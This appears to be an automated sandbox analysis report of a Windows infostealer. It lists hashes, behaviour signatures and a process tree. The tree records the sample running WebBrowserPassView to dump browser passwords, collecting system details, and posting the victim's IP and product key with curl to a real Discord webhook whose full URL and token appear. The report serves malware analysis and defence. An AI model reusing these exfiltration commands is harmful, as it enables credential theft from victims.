Analysis
-
max time kernel
47s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-03-2021 18:51
Static task
static1
Behavioral task
behavioral1
Sample
460c76892a939c1b7d563171c3b2d349.exe
Resource
win7v20201028
General
-
Target
460c76892a939c1b7d563171c3b2d349.exe
-
Size
10KB
-
MD5
460c76892a939c1b7d563171c3b2d349
-
SHA1
267857f6c93b33f87c7d3fd109d22fe3e7e33913
-
SHA256
6851d9ae6d9c3405a7fb92d93ec0bd87e3c52a6903e29ab55f2d7b779559d4b7
-
SHA512
f2e559032b4d8cdcd020e5b62fbdbe163fabe9af0c1f518eb0b33881c491c0a545297d2403a488dae752703d94ce5afa66fbfa63901bf875a5d2c0b9eee1d0ea
Malware Config
Signatures
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\temp\WebBrowserPassView.exe WebBrowserPassView C:\temp\WebBrowserPassView.exe WebBrowserPassView -
Nirsoft 2 IoCs
Processes:
resource yara_rule C:\temp\WebBrowserPassView.exe Nirsoft C:\temp\WebBrowserPassView.exe Nirsoft -
Executes dropped EXE 5 IoCs
Processes:
curl.execurl.exeWebBrowserPassView.execurl.exefiled.exepid process 504 curl.exe 296 curl.exe 2876 WebBrowserPassView.exe 2964 curl.exe 1896 filed.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 myexternalip.com 18 myexternalip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3168 timeout.exe -
Gathers system information 1 TTPs 8 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exepid process 184 systeminfo.exe 1896 systeminfo.exe 1372 systeminfo.exe 3416 systeminfo.exe 2500 systeminfo.exe 2968 systeminfo.exe 1204 systeminfo.exe 2252 systeminfo.exe -
Modifies registry class 2 IoCs
Processes:
460c76892a939c1b7d563171c3b2d349.exeWScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings 460c76892a939c1b7d563171c3b2d349.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings WScript.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
WebBrowserPassView.exepid process 2876 WebBrowserPassView.exe 2876 WebBrowserPassView.exe 2876 WebBrowserPassView.exe 2876 WebBrowserPassView.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
460c76892a939c1b7d563171c3b2d349.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 988 460c76892a939c1b7d563171c3b2d349.exe Token: SeIncreaseQuotaPrivilege 728 WMIC.exe Token: SeSecurityPrivilege 728 WMIC.exe Token: SeTakeOwnershipPrivilege 728 WMIC.exe Token: SeLoadDriverPrivilege 728 WMIC.exe Token: SeSystemProfilePrivilege 728 WMIC.exe Token: SeSystemtimePrivilege 728 WMIC.exe Token: SeProfSingleProcessPrivilege 728 WMIC.exe Token: SeIncBasePriorityPrivilege 728 WMIC.exe Token: SeCreatePagefilePrivilege 728 WMIC.exe Token: SeBackupPrivilege 728 WMIC.exe Token: SeRestorePrivilege 728 WMIC.exe Token: SeShutdownPrivilege 728 WMIC.exe Token: SeDebugPrivilege 728 WMIC.exe Token: SeSystemEnvironmentPrivilege 728 WMIC.exe Token: SeRemoteShutdownPrivilege 728 WMIC.exe Token: SeUndockPrivilege 728 WMIC.exe Token: SeManageVolumePrivilege 728 WMIC.exe Token: 33 728 WMIC.exe Token: 34 728 WMIC.exe Token: 35 728 WMIC.exe Token: 36 728 WMIC.exe Token: SeIncreaseQuotaPrivilege 728 WMIC.exe Token: SeSecurityPrivilege 728 WMIC.exe Token: SeTakeOwnershipPrivilege 728 WMIC.exe Token: SeLoadDriverPrivilege 728 WMIC.exe Token: SeSystemProfilePrivilege 728 WMIC.exe Token: SeSystemtimePrivilege 728 WMIC.exe Token: SeProfSingleProcessPrivilege 728 WMIC.exe Token: SeIncBasePriorityPrivilege 728 WMIC.exe Token: SeCreatePagefilePrivilege 728 WMIC.exe Token: SeBackupPrivilege 728 WMIC.exe Token: SeRestorePrivilege 728 WMIC.exe Token: SeShutdownPrivilege 728 WMIC.exe Token: SeDebugPrivilege 728 WMIC.exe Token: SeSystemEnvironmentPrivilege 728 WMIC.exe Token: SeRemoteShutdownPrivilege 728 WMIC.exe Token: SeUndockPrivilege 728 WMIC.exe Token: SeManageVolumePrivilege 728 WMIC.exe Token: 33 728 WMIC.exe Token: 34 728 WMIC.exe Token: 35 728 WMIC.exe Token: 36 728 WMIC.exe Token: SeIncreaseQuotaPrivilege 512 WMIC.exe Token: SeSecurityPrivilege 512 WMIC.exe Token: SeTakeOwnershipPrivilege 512 WMIC.exe Token: SeLoadDriverPrivilege 512 WMIC.exe Token: SeSystemProfilePrivilege 512 WMIC.exe Token: SeSystemtimePrivilege 512 WMIC.exe Token: SeProfSingleProcessPrivilege 512 WMIC.exe Token: SeIncBasePriorityPrivilege 512 WMIC.exe Token: SeCreatePagefilePrivilege 512 WMIC.exe Token: SeBackupPrivilege 512 WMIC.exe Token: SeRestorePrivilege 512 WMIC.exe Token: SeShutdownPrivilege 512 WMIC.exe Token: SeDebugPrivilege 512 WMIC.exe Token: SeSystemEnvironmentPrivilege 512 WMIC.exe Token: SeRemoteShutdownPrivilege 512 WMIC.exe Token: SeUndockPrivilege 512 WMIC.exe Token: SeManageVolumePrivilege 512 WMIC.exe Token: 33 512 WMIC.exe Token: 34 512 WMIC.exe Token: 35 512 WMIC.exe Token: 36 512 WMIC.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
460c76892a939c1b7d563171c3b2d349.exeWScript.exeWScript.execmd.exedescription pid process target process PID 988 wrote to memory of 3756 988 460c76892a939c1b7d563171c3b2d349.exe WScript.exe PID 988 wrote to memory of 3756 988 460c76892a939c1b7d563171c3b2d349.exe WScript.exe PID 3756 wrote to memory of 648 3756 WScript.exe WScript.exe PID 3756 wrote to memory of 648 3756 WScript.exe WScript.exe PID 648 wrote to memory of 188 648 WScript.exe cmd.exe PID 648 wrote to memory of 188 648 WScript.exe cmd.exe PID 188 wrote to memory of 504 188 cmd.exe curl.exe PID 188 wrote to memory of 504 188 cmd.exe curl.exe PID 188 wrote to memory of 296 188 cmd.exe curl.exe PID 188 wrote to memory of 296 188 cmd.exe curl.exe PID 188 wrote to memory of 2876 188 cmd.exe WebBrowserPassView.exe PID 188 wrote to memory of 2876 188 cmd.exe WebBrowserPassView.exe PID 188 wrote to memory of 2876 188 cmd.exe WebBrowserPassView.exe PID 188 wrote to memory of 2252 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 2252 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 1132 188 cmd.exe findstr.exe PID 188 wrote to memory of 1132 188 cmd.exe findstr.exe PID 188 wrote to memory of 184 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 184 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 3676 188 cmd.exe findstr.exe PID 188 wrote to memory of 3676 188 cmd.exe findstr.exe PID 188 wrote to memory of 1896 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 1896 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 1296 188 cmd.exe findstr.exe PID 188 wrote to memory of 1296 188 cmd.exe findstr.exe PID 188 wrote to memory of 1372 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 1372 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 2100 188 cmd.exe findstr.exe PID 188 wrote to memory of 2100 188 cmd.exe findstr.exe PID 188 wrote to memory of 3416 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 3416 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 692 188 cmd.exe findstr.exe PID 188 wrote to memory of 692 188 cmd.exe findstr.exe PID 188 wrote to memory of 2500 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 2500 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 3040 188 cmd.exe findstr.exe PID 188 wrote to memory of 3040 188 cmd.exe findstr.exe PID 188 wrote to memory of 2968 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 2968 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 3044 188 cmd.exe findstr.exe PID 188 wrote to memory of 3044 188 cmd.exe findstr.exe PID 188 wrote to memory of 1204 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 1204 188 cmd.exe systeminfo.exe PID 188 wrote to memory of 3180 188 cmd.exe findstr.exe PID 188 wrote to memory of 3180 188 cmd.exe findstr.exe PID 188 wrote to memory of 728 188 cmd.exe WMIC.exe PID 188 wrote to memory of 728 188 cmd.exe WMIC.exe PID 188 wrote to memory of 512 188 cmd.exe WMIC.exe PID 188 wrote to memory of 512 188 cmd.exe WMIC.exe PID 188 wrote to memory of 2652 188 cmd.exe WMIC.exe PID 188 wrote to memory of 2652 188 cmd.exe WMIC.exe PID 188 wrote to memory of 2964 188 cmd.exe curl.exe PID 188 wrote to memory of 2964 188 cmd.exe curl.exe PID 188 wrote to memory of 1896 188 cmd.exe filed.exe PID 188 wrote to memory of 1896 188 cmd.exe filed.exe PID 188 wrote to memory of 1896 188 cmd.exe filed.exe PID 188 wrote to memory of 3168 188 cmd.exe timeout.exe PID 188 wrote to memory of 3168 188 cmd.exe timeout.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe"C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe"1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC5⤵
- Executes dropped EXE
PID:504
-
-
C:\temp\curl.exeC:/temp/curl "https://myexternalip.com/raw"5⤵
- Executes dropped EXE
PID:296
-
-
C:\temp\WebBrowserPassView.exeC:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2876
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2252
-
-
C:\Windows\system32\findstr.exefindstr /c:"Host Name"5⤵PID:1132
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:184
-
-
C:\Windows\system32\findstr.exefindstr /c:"Domain"5⤵PID:3676
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:1896
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Name"5⤵PID:1296
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:1372
-
-
C:\Windows\system32\findstr.exefindstr /c:"OS Version"5⤵PID:2100
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:3416
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Manufacturer"5⤵PID:692
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2500
-
-
C:\Windows\system32\findstr.exefindstr /c:"System Model"5⤵PID:3040
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2968
-
-
C:\Windows\system32\findstr.exefindstr /c:"System type"5⤵PID:3044
-
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:1204
-
-
C:\Windows\system32\findstr.exefindstr /c:"Total Physical Memory"5⤵PID:3180
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size5⤵
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:512
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name5⤵PID:2652
-
-
C:\temp\curl.exeC:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:55:19.04\nIP Address :: 154.61.71.51\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA505, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC5⤵
- Executes dropped EXE
PID:2964
-
-
C:\temp\filed.exe"C:\temp\filed.exe" --processStart filed.exe5⤵
- Executes dropped EXE
PID:1896
-
-
C:\Windows\system32\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:3168
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1e69b6d630e694119f4f8c448a430b60
SHA1b118feca7d85ec706b54279a1dafc71673fe6e54
SHA2562f7eedbe9e3b0a3aa08df4fa2dc27de189484a8da8925cc6056513d744b7c00e
SHA51219924161f75cbbcf7bdf122f3aecb43d813186a6693413ccc15bb2945d48401c8f058edf034cc641cedc97ae5e328d88fabfab1b5f324014b83671b3ebd78822
-
MD5
a0db502b560752fe48d6e306e234b4d2
SHA121ada8b0e0ef785b4db08d006d36a6593871128d
SHA256f3572301f949b569f2f6e844b36932031830c83f08e044b21d785de6105b055d
SHA512e9f85c3ed0e2ca656f9d266c6d082793949567e309ec4c42a9c8194c397f666235a4cbc18ffddb08e777d9ca63c6e886fb49fee4ceb296396ba6073993cde894
-
MD5
053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA51235a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb
-
MD5
053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA51235a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb
-
MD5
19b99491c9a650e8a96239ecab3af43e
SHA14216f0029e06616dd6dfd08ce3be92cde3fdadf2
SHA25670b68853dc43e8e3338ee2ee31a833feb597976f9987986095733aa11aa53977
SHA512f6ca180a7a547160f085d341b9ee0e88b73c58ccbc16e3bf82f3b4363ed41fdf5c05227a1f9fbd62adea04cbf748fb394aa28bfc7935ef7e9c0afb8c5b68cc7d
-
MD5
18c68c9898be980227f33c213a2464aa
SHA11057b838cf913c5e188e6ec6697b6f2b49637c29
SHA2562782f0f8e89c786f40240fc1916677be660fb8d8e25dede50c9f6f7b0c2c2178
SHA5120d49bd1435a25b113a34ac38b337a9c904b6ac720824fd55d410ff6d8f6d0f637b54fd92cdff31d1c632b6a77f35fe55de9c756f35365387cea94f0fd93631b1
-
MD5
bb6cc0e0542d55d28c9a1bbb32253f76
SHA13033ddcf0ca904198922329d5e3a4bb03eb1e625
SHA2562bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338
SHA512073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996
-
MD5
bb6cc0e0542d55d28c9a1bbb32253f76
SHA13033ddcf0ca904198922329d5e3a4bb03eb1e625
SHA2562bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338
SHA512073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996
-
MD5
bb6cc0e0542d55d28c9a1bbb32253f76
SHA13033ddcf0ca904198922329d5e3a4bb03eb1e625
SHA2562bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338
SHA512073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996
-
MD5
bb6cc0e0542d55d28c9a1bbb32253f76
SHA13033ddcf0ca904198922329d5e3a4bb03eb1e625
SHA2562bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338
SHA512073770b356a9e35f2e0ce3ab5fe4c68c72c368782744111c4603b1620633b9fe7b9d8fe8e8b0747164ad1e8e498ded61ff2b184779ee41e69a1210c24a381996
-
MD5
a8e9c1fbd1020c06552277742bd56767
SHA19bdb692f5822941f4841847dfc1e2756ddad7197
SHA256a9ed81c4185ccc3ad9f437fa1cd775cb7d42fc6be6beaf9b956b77666e3b531c
SHA512d431e3f1e4c5150cfee287053f3e238883b589f9145a4737a1c6fe929e9b18664af3aa7b566c208fc47b38bbc7d1fdb6fdc780011b651783b9072a672483a7b2
-
MD5
a8e9c1fbd1020c06552277742bd56767
SHA19bdb692f5822941f4841847dfc1e2756ddad7197
SHA256a9ed81c4185ccc3ad9f437fa1cd775cb7d42fc6be6beaf9b956b77666e3b531c
SHA512d431e3f1e4c5150cfee287053f3e238883b589f9145a4737a1c6fe929e9b18664af3aa7b566c208fc47b38bbc7d1fdb6fdc780011b651783b9072a672483a7b2
-
MD5
ef10ccafd9271bef8d1162857d6c2182
SHA1fa0216a96d015cb29c8014dd889cbb4f98146f71
SHA25685f1898ca67d99c190bb5c1637727f7d82b41fe0ce8fb8351981efd2a582e91a
SHA51228c88b0f84467abe45d567af555a71617a16c3bf462910582a5ed2f182de84fa0ffd88aa04207765ed02d4c5a8d76eec808235f7f8f9c1ddea777119fca9347c
-
MD5
c8c6b64b81a851311e99d91724496dc3
SHA184dfd037612c878930263d02ecab16814ef47bf5
SHA256f76ba0c9cc7614a11a7e1217e2e738196d6da56dec9c96f90a8a64d9f80a4493
SHA512be6c21ab467e5d0e903c57bab8000edcaf21fc9e4795974a8df0fd6c9d398d8dac449b16bbb8b0cf6fe5ca8d7a8567d566d807ad27dbaebd26519eab91e19798
-
MD5
979ba252e2c4e3a386da68ff50fc9d0f
SHA1b8fce3dd4ff22aa2fa909c9992cdbddbdc2ffdc8
SHA25604084885435b6134e792c03f8b52bf6ea7135c7bd7ff8d3cc3aaedae2c667dae
SHA51240a35d0eb276e6983d38fc4469308e6d755507732835a8425e277e623ea4d1c42b4e6a20d6d8a68e82fdc35a8e8754139a440cf380d2520b48af1d4640373de2